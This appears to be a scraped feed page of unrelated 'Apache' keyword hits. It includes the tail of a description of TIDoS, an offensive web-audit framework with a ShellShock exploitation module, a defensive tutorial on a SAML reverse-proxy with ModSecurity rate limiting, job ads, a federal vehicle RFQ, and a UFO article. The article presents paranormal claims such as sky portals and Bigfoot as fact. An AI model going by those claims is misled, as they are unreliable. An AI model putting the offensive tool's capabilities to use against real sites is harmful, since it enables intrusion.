    • Web HoneyPot Probability ShodanLabs HoneyScore
  • Exploitation purely developmental
    • ShellShock

Other Tools:
  • net_info.py - Displays information about your network. Located under tools/.
  • tidos_updater.py - Updates the framework to the latest release via signature matching. Located under `tools/'.

TIDoS In Action:















Version:
v1.6 [latest release] [#stable]

Upcoming:
There are some bruteforce modules to be added:
  • Some more of Enumeraton & Information Disclosure modules.
  • Lots more of OSINT & Stuff (let that be a suspense).
  • More of Auxillary Modules.
  • Some Exploits are too being worked on.

Known Bugs:
This version of TIDoS is purely developmental and is presently stable. There are bugs in resolving the [99] Back at various end-points which results in blind fall-backs. Though I have added global exception handling, still, there maybe bugs out there. Also TIDoS needs to develop more on logging all info displayed on the screen (help needed).

Disclaimer:
TIDoS is provided as a offensive web application audit framework. It has built-in modules which can reveal potential misconfigurations and vulnerabilties in web applications which could possibly be exploited maliciously.
THEREFORE, I AM NOT EXCLUSIVELY RESPONSIBLE FOR ANY MISUSE OF THIS TOOLKIT.


Download TIDoS-Framework

          2 Houston cos. join forces in $3.5B midstream firm      Cache   Translate Page   Web Page Cache   

Two Houston-based companies have partnered to create a new midstream firm.  Apache Corp. (NYSE: APA) and Kayne Anderson Acquisition Corp. (Nasdaq: KAAC, KAACU, KAACW) will form a new company called Altus Midstream Co. that’s expected to have a market capitalization of $3.5 billion at formation, based on 354.4 million common shares outstanding at a $10 share…

link: 2 Houston cos. join forces in $3.5B midstream firm


          Protecting internal applications with a SAML-aware reverse-proxy (a tutorial)      Cache   Translate Page   Web Page Cache   

My employer wholly embraces the coffee-shop model for employee access, which can induce a bit of stress if your job is to protect company resources.  Historically, we have had to support some applications that:

  1. Don’t support SAML (or whatever flavor of federation you prefer)
  2. Probably wouldn’t be exposed outside of the firewall/VPN at most companies because they were never designed to be Internet-facing

We are an enterprise, but only had a small handful of these ‘naughty’ systems. It wasn’t super cost-effective to jump into a 1500+ employee seat contract with Duo (now Cisco), Cloudflare Access, or ScaleFT Zero Trust Web Access1 just to solve this particular problem across a small number of hosts. Yet, employees were frustrated that most day-to-day operations did not require jumping on a corporate VPN until you had to reach one of these magical systems.

I designed a SAML-aware reverse-proxy using a combination of Apache 2.4, mod_auth_mellon, and a sprinkling of ModSecurity to add some rate limiting capabilities.  The following examples assume Ubuntu 16.04, but you can use whatever OS you’d like, assuming you know how to get the requisite packages.

Install dependencies and enable Apache modules

sudo apt-get install apache2, libapache2-mod-auth-mellon, libapache2-modsecurity
sudo a2enmod proxy_http proxy ssl rewrite auth_mellon security2

Configure ModSecurity

Our ModSecurity install will do one thing and one thing only: rate limit (by IP) access attempts by non-authenticated users.

Create or overwrite /etc/modsecurity/modsecurity.conf and put the following content:

# A minimal ModSecurity configuration for rate limiting
# on a large number of HTTP 401 Unauthorized responses.
SecRuleEngine On
SecRequestBodyAccess On
SecRequestBodyLimit 13107200
SecRequestBodyNoFilesLimit 131072
SecRequestBodyInMemoryLimit 131072
SecRequestBodyLimitAction ProcessPartial
SecPcreMatchLimit 1000
SecPcreMatchLimitRecursion 1000
SecResponseBodyMimeType text/plain text/html text/xml
SecResponseBodyLimit 524288
SecResponseBodyLimitAction ProcessPartial
SecTmpDir /tmp/
SecDataDir /tmp/
SecAuditEngine RelevantOnly
SecAuditLogRelevantStatus "^(?:5|4(?!04))"
SecAuditLogParts ABIJDEFHZ
SecAuditLogType Serial
SecAuditLog /var/log/apache2/modsec_audit.log
SecArgumentSeparator &
SecCookieFormat 0
SecUnicodeMapFile unicode.mapping 20127
SecStatusEngine On

# ====================================
# Rate limiting rules below
# ====================================

# RULE: Rate-Limit on HTTP 401 response codes
# Set IP address value to a variable
SecAction "phase:1,initcol:ip=%{REMOTE_ADDR},id:'1006'"
# On HTTP status 401, increment a counter (block_script), and expire that value out of cache after 300s
SecRule RESPONSE_STATUS "@streq 401" "phase:3,pass,setvar:ip.block_script=+1,expirevar:ip.block_script=300,id:'1007'"
# On counter variable (block_script) being greater than or equal to '20', deny with HTTP 429 Too Many Requests
SecRule ip:block_script "@ge 20" "phase:3,deny,severity:ERROR,status:429,id:'1008'"

Feel free to add your own ModSecurity rules if you’d like to do things like detecting/blocking remote shell attempts, SQL injection, etc, but that’s not something I intend to cover here.

Modify the site (vhost) configuration

In case it’s non-obvious, in the following commands feel free to change out ‘myservicename’ with an appropriate identifier for service you are protecting with this gateway setup.

Head over to /etc/apache2/sites-enabled and open the vhost config file you intend to add protection to (or modify the default one, if this is a new install).

<IfModule mod_ssl.c>
 <VirtualHost _default_:443>
  ServerAdmin [email protected]
  [...]
  # MSIE 7 and newer should be able to use keepalive
  BrowserMatch "MSIE [17-9]" ssl-unclean-shutdown

  ProxyRequests Off
  ProxyPass /secret/ !

  # If fronting a locally-installed app, just forward to
  # the correct listening port. Alternatively,
  # you can address a system on another domain and port.
  ProxyPass / https://127.0.0.1:8000/ retry=10
  ProxyPassReverse / https://127.0.0.1:8000/

  ErrorDocument 401 "\
<html>\
<title>Access Restricted</title>\
<body>\
<h1>Access is restricted to organizational users.</h1>\
<p>\
<a href=\"/secret/endpoint/login?ReturnTo=/\"><strong>Click here to login via single sign-on, or wait for 2 seconds to be redirected automatically.<strong></a><br /><br /><br /><br /><a href=\"/#noredirect\">Temporarily disable redirection.</a>if(window.location.hash == \"\") { window.setTimeout(function(){ window.location.href = \"/secret/endpoint/login?ReturnTo=\" + encodeURIComponent(window.location.pathname + window.location.search); }, 2000); }\
</p>\
</body>\
</html>"

  <Location />
   # Documentation on what these flags do can be found in the docs:
   # https://github.com/Uninett/mod_auth_mellon/blob/master/README.md
   MellonEnable "info"
   AuthType "Mellon"
   MellonVariable "cookie"
   MellonSamlResponseDump On
   MellonSPPrivateKeyFile /etc/apache2/mellon/urn_myservicenname.key
   MellonSPCertFile /etc/apache2/mellon/urn_myservicenname.cert
   MellonSPMetadataFile /etc/apache2/mellon/urn_myservicenname.xml
   MellonIdpMetadataFile /etc/apache2/mellon/idp.xml
   MellonEndpointPath /secret/endpoint
   MellonSecureCookie on
   # session cookie duration; 43200(secs) = 12 hours
   MellonSessionLength 43200
   MellonVariable "proxyweb"
   MellonUser "NAME_ID"
   MellonDefaultLoginPath /
   MellonSamlResponseDump On

   # This 'requirement' is actually going to be
   # optional. We also give some trusted IPs below,
   # and tell Apache we can fulfill either requirement.
   Require valid-user
   Order allow,deny

   # This is where you can whitelist IPs or
   # even entire network ranges, perfect for
   # systems that still need to accept
   # some API traffic from known networks.
   Allow from 10.20.30.0/24
   Allow from 10.10.110.66

   # Allow one of the above to be good enough.
   # You could change this to 'all' if you need
   # to satisfy SSO required AND valid network
   # required.
   Satisfy any
  </Location>

  <Location /secret/endpoint/>
   AuthType "Mellon"
   MellonEnable "off"
   Order Deny,Allow
   Allow from all
   Satisfy Any
  </Location>

 </VirtualHost>
</IfModule>

Create SAML SP metadata files

We’ll download and use a shell script from the mod_auth_mellon authors to create the necessary SP metadata files:

sudo mkdir -p /etc/apache2/mellon/
cd /etc/apache2/mellon/
wget https://raw.githubusercontent.com/Uninett/mod_auth_mellon/master/mellon_create_metadata.sh
bash mellon_create_metadata.sh urn:myservicenname https://<YOURDOMAIN>/secret/endpoint

Now your directory structure should resemble the following:

[email protected]:/etc/apache2/mellon/# ls
mellon_create_metadata.sh urn_myservicenname.cert urn_myservicenname.key urn_myservicenname.xml

mellon_create_metadata.sh is no longer needed and can be deleted, if you so choose.

Create the SAML 2.0 application profile on your IdP

Go to your identity provider and provision the new application. For this example, I’m using Okta (who I highly recommend):

screencapture-workiva-admin-oktapreview-admin-apps-saml-wizard-edit-webfilings_samlgateway_1-2018-08-07-14_21_25.png

Place SAML IdP metadata

Finally, grab the IdP metadata and put it on your clipboard:

Screen Shot 2018-08-07 at 2.24.29 PM.png

Drop its contents into a new file at /etc/apache2/mellon/idp.xml:

[email protected]:/etc/apache2/mellon# cat idp.xml
<?xml version="1.0" encoding="UTF-8"?>
<md:EntityDescriptor xmlns:md="urn:oasis:names:tc:SAML:2.0:metadata" entityID="http://www.okta.com/exkd2n9ujpQFaUq8f0h7">
<md:IDPSSODescriptor WantAuthnRequestsSigned="false" protocolSupportEnumeration="urn:oasis:names:tc:SAML:2.0:protocol">
<md:KeyDescriptor use="signing">
<ds:KeyInfo xmlns:ds="http://www.w3.org/2000/09/xmldsig#">
<ds:X509Data>
<ds:X509Certificate>MIIDBzCCAe+gAwIBAgIJAJAD/4DMpp7vMA0GCSqGSIb3DQEB
[...]

Restart Apache and Test

sudo systemctl reload apache2

Now head to your application and check out the results:

Screen Shot 2018-08-07 at 2.49.31 PM

Redirected to an auth challenge – perfect!

Quickly adding SAML support to PHP/Python/Rails/Node/etc apps on the same host

In your organization’s homegrown applications where an existing Apache 2 server is acting as a front-end, this same principle can be used to quickly add SAML support. In your vhost config in the Mellon options, add:

<Location />
 [...]
 RequestHeader set Mellon-NameID %{MELLON_NAME_ID}e

In your application, simply check for a value in this header and use it if present. For instance, in Python’s Flask framework:

@login_manager.request_loader
def load_user_from_request(request):

    nameid = request.headers.get('Mellon-NameID')
    if nameid:
        user = User.query.filter_by(username=nameid).first()
        if user:
            return user
        else:
            # Provision user's account for first use 
            user = User(nameid)
            return user

    # return None if method did not login the user
    return None

Back-end on another host

Some applications, like Splunk, can receive login user information via request header (note: Splunk now supports SAML natively, but it still makes for a good example app).  We can direct mod_auth_mellon to send this header along with the information about an authenticated user. Mellon populates the field ‘MELLON_NAME_ID’ with the IdP username ([email protected]) after successful authentication.

In your vhost config in the Mellon options, add:

<Location />
 [...]
 # Pass Splunk a request header declaring the user who has logged in
 # via SAML. The regex test at the end of this line ensures that
 # MELLON_NAME_ID is not an empty string before attempting to set
 # the SplunkWebUser header to the value of MELLON_NAME_ID.
 # Splunk unfortunately freaks out if the SplunkWebUser header is
 # declared but it has no value.
 RequestHeader set SplunkWebUser %{MELLON_NAME_ID}e "expr=-n %{env:MELLON_NAME_ID}"

Be careful to make sure your back-end application is only accessible via this reverse-proxy though, otherwise someone with local network access could simply send the back-end server requests directly with this header to bypass authentication entirely2. In Splunk’s case, that’s what the values under ‘trustedIP’ in $SPLUNK_HOME/etc/system/local/web.conf are for.

Footnotes

1. ScaleFT’s overall offering appears to be very enticing, and I see their recent acquisition by Okta as a great development. Because it addresses several other pain points, we are actively working to deploy ScaleFT at my organization, which will likely replace the home-grown solution described in this post.

2. Do your part to prevent data breaches by seeking assistance from someone with relevant security experience if you are unsure whether or not your back-end application on another host is properly protected from such an attack.


          Telecommuting Customer Operations Engineer      Cache   Translate Page   Web Page Cache   
A software company is in need of a Telecommuting Customer Operations Engineer. Candidates will be responsible for the following: Contributing to process development Working with customers to resolve a wide range of issues Communicating with our core engineering team to provide real-time product feedback from the field Qualifications for this position include: Attending team events Experience in diagnosing, reproducing, and resolving customer issues Desire to make customers successful through direct interaction Excitement in learning about streaming data and becoming a domain expert in Apache Kafka
          Telecommuting Customer Operations Engineer      Cache   Translate Page   Web Page Cache   
A computer software company has an open position for a Telecommuting Customer Operations Engineer. Core Responsibilities Include: Improving product documentation and authoring knowledge base articles Contributing to process development Working with customers to resolve a wide range of issues Applicants must meet the following qualifications: Regular company wide and team events Desire to make customers successful through direct interaction Excitement in learning about streaming data and becoming a domain expert in Apache Kafka Experience in diagnosing, reproducing, and resolving customer issues
          Java Developer - ALTA IT Services, LLC - Clarksburg, WV      Cache   Translate Page   Web Page Cache   
Experience with the following technologies – J2EE, Weblogic, Java, Javascript, JQuery, AngularJS, Apache, Linux, Subversion, and GitHub....
From ALTA IT Services, LLC - Tue, 12 Jun 2018 17:33:52 GMT - View all Clarksburg, WV jobs
          Junior Full Stack Web Developer - Education Analytics - Madison, WI      Cache   Translate Page   Web Page Cache   
Web server technologies like Node.js, J2EE, Apache, Nginx, ISS, etc.,. Education Analytics is a non-profit organization that uses data analysis to inform...
From Education Analytics - Fri, 06 Jul 2018 11:19:28 GMT - View all Madison, WI jobs
          1 New Diesel Utility Vehicle and Accessories      Cache   Translate Page   Web Page Cache   
RFQ, COMBINED SYNOPSIS/SOLCITATION NOTICE

General Information
Document Type: RFQ
RFQ Number: RFQ-18-PHX-20
Posted Date: 08/07/2018
Response Date: 08/22/2018 @ 4:00 PM MST
Classification Code: 2320
Set Aside: 100% Native American Owned Small Business
NAICS Code: 333111

Contracting Office Address
Attention: Donovan Conley, Contract Specialist
IHS, Phoenix Area Office, Division of Acquisition Management
40 North Central Avenue, Two Renaissance Square
Phoenix, AZ 85004
Office: 602-364-5174
Email: donovan.conley@ihs.gov

Description
This is a combined synopsis/solicitation for commercial items prepared in accordance with the format in Subpart 12.6, as supplemented with additional information included in this notice. This announcement constitutes the only solicitation; quotes are being requested and a written solicitation will not be issued. The Government will award a firm-fixed price contract resulting from this combined synopsis/solicitation, to the responsible offeror whose offer is conforming to the "Brand Name or Equal" synopsis/solicitation where best value is expected when utilizing Lowest Price Technically Acceptable (LPTA) procedures.


This solicitation is issued under Request for Quotations (RFQ) and the solicitation number is RFQ-18-PHX-20. This acquisition is restricted to 100% Native American Owned Small Business. The North American Industry Classification System (NAICS) code is 333111 and the size standard is 1,250 employees. The quote document and incorporated provisions and clauses are those in effect through Federal Acquisition Circular 2005-96 / 11-06-2017.


The Whiteriver Service Unit's Facility Department is procuring for one (1) new diesel utility vehicle and accessories.


All questions regarding this RFQ for Items must be in writing and will be sent by email to donovan.conley@ihs.gov.


Questions must be received no later than 08/22/2018 at 12:00 PM MST. No further questions will be accepted after that date and time.


You are reminded that representatives from your company SHALL NOT contact any Whiteriver Service Unit's employees to discuss this RFQ during this RFQ process. All questions and concerns regarding this RFQ shall be directed to the Contracting Officer or Contract Specialist Donovan Conley.


Schedule, See Attachment Synopsis-Solicitation RFQ-18-PHX-20


PLEASE ENTER THE UNIT PRICE AND AMOUNT FOR THE CLIN(S) BELOW
Separate quotes shall include RFQ number on Quote.
Not providing a price for all CLINs would result in your offer as being nonresponsive to the solicitation.


FAR 52.211-6, Brand Name or Equal - All items must comply and must have the alike salient characteristics of the items stated below, to include technical documentation to support products being offered as equal items.



Basis of Award


This acquisition will utilize Lowest Price Technically Acceptable (LPTA) source selection procedures. This is a competitive LPTA best value source selection in which technically acceptable is considered the most important factor. By submission of its offer, the Offeror accepts all solicitation requirements, including terms and conditions, representations and certifications, and technical requirements. Failure to meet a requirement may result in an offer being determined technically unacceptable. Offerors must clearly identify any exception to the solicitation and conditions and provide complete accompanying rationale.


In order for an Offeror to be considered for award, the proposal must receive an "Acceptable" rating in every non-price factor. Any proposal receiving a rating of "Unacceptable" in any non-price factor will not be further evaluated.


The Government intends to award one (1) contract for this RFQ notice.


For the purpose of award, the government shall evaluate offers based on the evaluation factors described below:

FACTOR 1 - Technical (Acceptable/Unacceptable)
FACTOR 2 - Price


Factor 1 - Technical:


Offeror shall provide brief description of alike salient characteristics of the items stated in the Schedule, to include technical specification and product literature documentation to support products being offered as equal items.


The Government will evaluate the contractor's product technical specification and product literature to ensure that it reflect sound understanding of Factor 1 - Technical.


Ratings:
Acceptable
- Proposal clearly meets the minimum requirements of the solicitation.
Unacceptable - Proposal does not clearly meet the minimum requirements of the solicitation.


Factor 2 - Price:


The Government will evaluate the quote to determine the price fair and reasonableness in accordance with FAR 13.106-3(a).


Offer must be good for 60 calendar days after submission.


FOB Destination CONUS (Continental U.S.). Shipping charges shall be included in the purchase cost of the product. Sellers shall deliver the products on their own conveyance to the location listed on the award.



Quotations Preparations Instructions: A completed quotation consist of four parts.


a) Technical: Provide brief description of alike salient characteristics of the items stated above, to include technical documentation to support products being offered as equal items.


b) Price Schedule: Provide product information and price(s) for all Contract Line Item Number (CLIN) numbers. Include manufacturer name and model number, description of supply, unit of issue, unit price, extended total amount and grand total. Nott providing a price for all CLINs would result in your offer as being nonresponsive to the solicitation.


c) In order to be considered for an award, an offeror must have completed the online electronic Representations and Certifications located at https://www.sam.gov/ in accordance with FAR 4.1201(a). By submission of an offer, the offeror acknowledges the requirement that a prospective awardee shall be registered in SAM at https://www.sam.gov/ prior to award, during performance, and through final payment of any contract, basic agreement, basic ordering agreement, or blanket purchasing agreement resulting from this solicitation [Note: Lack of registration in the System for Award Management will make an offeror ineligible for award.].


d) Offeror to fill out Contract Administrative Data in attachment SAP Clauses and Contract Administrative Data


Clauses: See attachment, SAP Clauses and Contract Administrative Data
Provisions: See attachment, Provisions


Set-aside code: Indian Small Business Economic Enterprises Place of performance:  Whiteriver Service Unit 400 West Apache Drive, Facility Dept. Whiteriver, AZ  85941  US Contact: Donovan Conley, Contract Specialist, Phone 602-364-5174, Fax 602-364-5030, Email donovan.conley@ihs.gov - Brian G Numkena, Contract Specialist, Phone 602-364-5020, Email brian.numkena@ihs.gov
           "WHAT? ... ANOTHER CUBE?" -> THE TEXAS BLACK CUBES ... A 2nd PHOTO-      Cache   Translate Page   Web Page Cache   
The first picture of the appearance of an unidentified black cube over Texas.

 

"Another Cube..." 

The 2nd Black Cube photo

By Mary Alice Bennett

(Copyright 2015, Mary Alice Bennet - All rights Reserved)

<Edited by Robert D. Morningstar>

*******

Michael Nielson: -> "Another cube reportedly seen in Texas.  Its either the vanguard of the Borg assimilation fleet or its a kite flown by the Borgmans.  My question is simple:

 "Why would an advanced race of beings travel 100-trillion miles just to hover in the clouds over McAllen, Texas in their decidedly poorly aerodynamic cube?

Why not a sphere?

 Are they here for our spherical technology...or...the TexMex....?"

 

*******

The 1st "Black Cube" Photo.

The black color of this perfect cube reminds me of the color of mourners and the fact that was are missing our editor Dirk, is this phenomenon a tribute to him? The manifestation of the shape out of the atmosphere reminds me of the paranormal activities in Uintah, Utah at Skniwalker Ranch: Paranormal Corridor - Southwest USA by Mary Alice Bennett Skinwalker Ranch "Using infrared binoculars, a researcher in Utah was able to observe a large black animal crawling through a tunnel into our dimension. The ape-like creature moved along using its elbows. After exiting and sauntering off into the night, the anomalous yellow light which contained the tunnel, slowly faded away. This is but one of the events which occurred on the Skinwalker Ranch property while paranormal researchers were there. The tunnel appeared after a meditation session.

After another earlier attempt at meditating, an energy field was seen to swoop down upon the seated fellow. It uttered an animal roar as it sped by - the meditator was completely terrified. The researchers compared what they`d seen to the invisible force scene from the movie "Predator". Some of the other creatures who populate the Uintah Basin in N.E. Utah are only detectable because they block out the stars or by the enormous foot or claw prints that they leave behind. The rancher and his family had moved there in good faith, bringing their expensive herd of Angus cattle to the property. They lost so many cows there that they eventually had to leave, allowing the research team to take their place. Whatever is there does not allow domesticated livestock to pollute its sacred ground. Previous tenants had been warned not to try to dig anywhere on the land. In the 1770s the exploring Spanish had noticed underground activity there along with flying lights. The Ute tribe has 15 generations of tales to tell. There are deposits of the rare hydrocarbon Gilsonite on the ranch.

The UFO underground mining activity is similar to the situation in Pine Bush, New York. Large black flying triangles are seen in both areas. The rancher had seen a craft entering the atmosphere through a hole in the sky. At night he was able to see blue sky through one of these openings, as if it were the entrance to another world. There was another tunnel up there whose entrance opened directly opposite their homestead. Many of the sightings of anomalous creatures were one-time events, as if the animals were just passing through our dimension. When they first came to the land, the rancher`s wife was greeted at the gate by an oversized wolf that had to lean down in order to gaze into her car window. This sighting is reminiscent of the paranormal black dog of Norfolk, England which inspired the Sherlock Holmes mystery, "The Hound of the Baskervilles". "Black Shuck" as they call him, once appeared in a church, killing two people on his way out. The burn marks he left as he retreated are still visible on the doorway. There had been no repopulation of wolves to the Uinta region.

Soon after this encounter, the rancher`s wife observed what seemed to be an RV out in the field. There was a dark figure seated behind a desk inside. When he stood up, he took up the entire doorway. He was wearing a black helmet with a visor, black clothes and boots. The next day she and her husband went out to the field. When she saw the 18" bootprints he`d left behind, she became hysterical. The RV-type craft has also been seen in Brazil where they are called "chupas". These UFOs have been known to hunt the Amazonian hunters who wait in the trees at night for animals to pass by. A darting red light chased the horses off a cliff one night resulting in serious injuries. Sometimes the animals were seen to panic from the presence of invisible creatures.

The rancher advised the research team to stalk the phenomenon as if it were a wild animal.  He`d observed a multicolored craft one night which lit up the snow with its colorful lights.  When a twig broke, the craft turned off its lights and turned towards him.  The rancher thought that this was the type of reaction that one would expect from a living creature.  In Dulce, New Mexico, sightings of enormous UFOs are not uncommon.  One huge manta-ray shaped ship appeared to be covered with the skin of a sea creature.   It was grey, dimpled, and wrinkled.   A little ET was spotted with the same sort of skin.

Some theorize that the craft themselves are alive. This echoes the words of Ezekiel in his first chapter, the famous Biblical UFO encounter.  Ezekiel refers to the "wheel within a wheel" form of the "Throne of God" and to the "living creatures," which accompany the wheels flying in the sky.

The area of N.W. New Mexico is also famous for its suit-wearing "Wolfmen" and ghastly-faced " ghost runners," which have been known to keep pace with the patrol cars of the Highway Patrol.

How do you know whether it was a Bigfoot who raided your garden?

Answer: Only the fruit on the top of the tree is gone.

Last week, there was a sighting of a white Bigfoot up in Fort Apache, Arizona.  Since these animals are known to appear on or near Indian reservations, the news was not a surprise.  The author likes it noted that all of the examples used in this article were taken from the book "The Hunt for the Skinwalker", but the comparisons were not." (Available on Amazon).

 

The appearance of a large black Bigfoot from a conduit coming out of the sky in Utah is similar to the manifestation of the black cubes from the clouds over Texas.

"What is Gilsonite?"

"Gilsonite is a natural, resinous hydrocarbon found in the Uintah Basin in northeastern Utah; thus, it is also called Uintahite.  This natural asphalt is similar to a hard petroleum asphalt and is often called a natural asphalt, asphaltite, uintaite, or asphaltum.  Gilsonite is soluble in aromatic and aliphatic solvents, as well as petroleum asphalt.  Due to its unique compatibility,  Gilsonite is frequently used to harden softer petroleum products.  Gilsonite in mass is a shiny, black substance similar in appearance to the mineral obsidian.  It is brittle and can be easily crushed into a dark brown powder.  When added to asphalt cement or hot mix asphalt in production,  Gilsonite helps produce paving mixes of dramatically increased stability."

This dramatic event and this article memorializes for me our much esteemed and greatly missed editor Dirk. 

IN MEMORIAM: -> DIRK VANDER PLOEG, UFO DIGEST PUBLISHER, PASSES on JUNE 26TH, 2015

Mary Alice Bennett

July 27th, 2015

Extra information about the article: 
Some comparitive information concernig a recent paranormal phenomenon in the sky over Texas.
Categories: 

           2010 TVS Apache RTR 44000 Kms       Cache   Translate Page   Web Page Cache   
Price: ₹ 24,000, Model: Apache RTR, Year: 2010 , KM Driven: 44,000 km,
2010 TVS Apache RTR 44000 Kms https://www.olx.in/item/2010-tvs-apache-rtr-44000-kms-ID1mBRPP.html
          These Oil Stocks Just Cashed in on the Permian Basin Pipeline Craze      Cache   Translate Page   Web Page Cache   
Apache and Occidental Petroleum snagged premium prices for their midstream assets in the red-hot shale oil region.
          (USA-AZ-Springerville) Wildlife Biologist      Cache   Translate Page   Web Page Cache   
* Videos * Duties Help ## Duties ### Summary Positions open to current permanent Federal employees with competitive status, CTAP/RPL/ICTAP, VEOA eligibles, Land Management Workforce Flexibilty Act, Farm Service Agency permanent county employees, Public Land Corps, and Resource Assistant Program eligibles. These positions are located on a Forest Service Unit and responsible for providing professional wildlife expertise in the protection, management, and improvement of wildlife within the framework of multiple-use management of forest and range lands. Seven positions are being filled by this vacancy announcement, one at each of the following locations. 1. Lincoln National Forest, Sacramento Ranger District in Cloudcroft, NM. For additional information about this position, please contact Phillip Hughes at 682-5302 or philliphughes@fs.fed.us. 2. San Bernadino National Forest, Front Country Ranger District in Lytle Creek, CA. For additional information about this position, please contact Joseph Rechsteiner at 909-382-2860 or jrechsteiner@fs.fed.us. 3. National Forests in Texas, Angelina-Sabine Ranger District in Zavalla, TX. For additional information about this position, please contact Ron Hasken at 936-897-1068 or rhasken@fs.fed.us. 4. Hiawatha National Forest, Munising Ranger District in Munising, MI. For additional information about this position, please contact Luke Langstaff at 906-387-2512 ext. 1026 or langstaff@fs.fed.us. 5. Apache-Sitgreaves National Forest, Springerville Ranger District in Springerville, AZ. For additional information about this position, please contact Valerie Horncastle at 928-333-6234 or vhorncastle@fs.fed.us. 6. Wayne National Forest, Ironton Ranger District in Pedro, OH. For additional information about this position, please contact Dana Moler at 740-753-0905 or dmoler@fs.fed.us. 7. Wayne National Forest, Athens Ranger District in Nelsonville, OH. For additional information about this position, please contact Dana Moler at 740-753-0905 or dmoler@fs.fed.us. Pay rates vary depending on location. Pay rates displayed above are for the Rest of the U.S. (RUS). See the OPM website at http://www.opm.gov/policy-data-overisght/pay-leave/salaries-wages/ for additional information on pay rates for specific locations. Learn more about this agency ### Responsibilities **Duties listed are at the full performance level:** Provides technical advice and leadership for a wildlife management program. This includes gathering, compiling, and analyzing data to determine wildlife habitat requirements and management needs; assessing habitat quality and quantity, interpreting biological requirements for all wildlife species and their habitat; inventorying and monitoring habitat and in some cases populations; determining the need for and recommending wildlife habitat restoration, enhancement or improvement projects; and studying and recommending solutions to special coordination problems involving wildlife habitat protection. Performs specific portions or minor phases of assignments in support of Integrated Resource Inventory (IRI) activities. Incumbent prepares field data to be digitized; digitizes data and processes data for use in geographic information systems (GIS). Documents field procedures and office methodologies produced by IRI team to develop information on IRI data layers. Works cooperatively with State and/or other wildlife resource agencies. Coordinates wildlife management with timber, grazing, minerals and recreation and other land management programs. This includes gathering information for wildlife management plans, surveys of game and nongame occurrence, mapping key habitat for suitability, determination of annual browse utilization and/or amount of soil disturbance, joint recommendations for annual game harvest, and the need for wildlife habitat development or restoration. Prepares wildlife management input for the unit land management planning team. Prepares environmental analysis reports. Develops biological evaluations/biological assessments for review by journey-level biologists. Recommends, prepares, or reviews annual operating plans and budgets for wildlife habitat improvement and animal damage control projects in consideration of biological needs, project standards, and the needs of other resources. Participates in wildlife monitoring program activities by making observations, gathering data, and reporting findings. Gathers information to be used in environmental assessments and environmental impact statements affecting wildlife resources. Develops plans for information and education activities in wildlife conservation. Responsible for assigned areas of public relation activities, such as speaking at meetings and participating in field trips. Serves as project leader on wildlife habitat improvement projects and participates on interdisciplinary teams in all aspects of natural resource management, which may include program evaluation. Manages partnership programs for wildlife and rare plants. ### Travel Required Occasional travel - Occasional travel may be required for field visits and training. ##### Supervisory status No ##### Promotion Potential 09 ### Who May Apply #### This job is open to… Current permanent Federal employees with competitive status, Land Management Workforce Flexibility Act, CTAP/RPL/ICTAP, VEOA; Farm Service Agency permanent county employees; Public Land Corp eligibles; and Resource Assistant Program eligibles. Questions? This job is open to 4 groups. * #### Job family (Series) 0486 Wildlife Biology #### Similar jobs * Biologists, Wildlife * Wildlife Biologists * Requirements Help ## Requirements ### Conditions of Employment * You must be a US Citizen or US National * Males born after 12/31/59 must be Selective Service registered or exempt * Successful completion of a one-year probationary period required. **ADDITIONAL INFORMATION: **Selectee will be responsible for tax obligations related to payments for moving expenses (2017 Tax Cuts and Jobs Act, Public Law 115-97). Questions should be directed to the Travel Help Desk, 877-372-7248, Option 1, or email asctos@fs.fed.us. **Apache-Sitgreaves NF, Springerville RD in Springerville, AZ.**Fill at Grade Level(s): GS-7/9 Bargaining Unit: No TOS: Mandatory allowance with temporary quarters (30 days)** Lincoln NF, Sacramento RD in Cloudcroft, NM****Fill at Grade Level(s): GS-7/9 Bargaining Unit: No TOS: Full**** **San Bernadino NF, Front Country RD in Lytle Creek, CA.** Fill at Grade Level(s): GS-7/9 Bargaining Unit: No TOS: Basic moving expenses; other relocation benefits will be negotiated with selectee. **NFs in Texas, Angelina-Sabine RD in Zavalla, TX.** Fill at Grade Level(s): GS-7/9 Bargaining Unit: Position not included in the bargaining unit. TOS: Mandatory TOS only (one way move, movement and storage of household goods) **Hiawatha NF, Munising RD in Munising, MI.** Fill at Grade Level(s): GS-7/9 TOS expenses paid: House Hunting Trip and Temporary Quarters. Bargaining Unit: Yes (NFFE - Local Lodge 2086) **Wayne NF, Ironton RD in Pedro, OH.** Fill at Grade Level(s): GS-5/7/9 TOS expenses paid: House Hunting Trip and Temporary Quarters. Bargaining Unit: No **Wayne NF, Athens District in Nelsonville, OH.** Fill at Grade Level(s): GS-5/7/9 TOS expenses paid: House Hunting Trip and Temporary Quarters. Bargaining Unit: No Positions may be filled as career ladders or could be filled at the full performance level dependent upon the individual unit’s needs. Example: The selecting official may select at any grade to include the full performance level of the position. However, not all positions will be filled at the highest grade level. If you are selected for a position with further promotion potential, you will be placed under a career development plan, and may be non-competitively promoted if you successfully complete the requirements and if recommended by management. However, promotion is not guaranteed. ### Qualifications Applicants must meet all qualifications and eligibility requirements as defined below by the closing date of the announcement. For more information on the qualifications for this position, go to: https://www.opm.gov/policy-data-oversight/classification-qualifications/general-schedule-qualification-standards/0400/fish-biology-series-0482/ **Wildlife Biology Series (0486) Basic Requirements:** Degree: Successful completion of a full 4-year course of study in an accredited college or university leading to a bachelor's or higher degree that included a major field of study in biological science that included at least 9 semester hours in such wildlife subjects as mammalogy, ornithology, animal ecology, wildlife management, or research courses in the field of wildlife biology; and at least 12 semester hours in zoology in such subjects as general zoology, invertebrate zoology, vertebrate zoology, comparative anatomy, physiology, genetics, ecology, cellular biology, parasitology, entomology, or research courses in such subjects (Excess courses in wildlife biology may be used to meet the zoology requirements where appropriate.); and At least 9 semester hours in botany or the related plant sciences * OR- Combination of education and experience: equivalent to a major in biological science (i.e., at least 30 semester hours), with at least 9 semester hours in wildlife subjects, 12 semester hours in zoology, and 9 semester hours in botany or related plant science, as shown in A above, plus appropriate experience or additional education. Experience refers to paid and unpaid experience, including volunteer work done through National Service programs (e.g., Peace Corps, AmeriCorps) and other organizations (e.g., professional; philanthropic; religious; spiritual; community, student, social). Volunteer work helps build critical competencies, knowledge, and skills and can provide valuable training and experience that translates directly to paid employment. You will receive credit for all qualifying experience, including volunteer experience. **GS-05:** Applicants who meet the basic requirements described in the individual occupational requirements are fully qualified for the specified entry grade level (No additional requirements required) **GS-07:** In addition to the requirements described above, the following education and/or experience are required for the GS-07 level: One year or more of specialized experience equivalent to at least the GS-05 grade level; **OR** One full year of graduate level education; **OR** An appropriate combination of graduate level education and specialized experience; **OR** Superior Academic Achievement (go to this site determine if you are eligible: 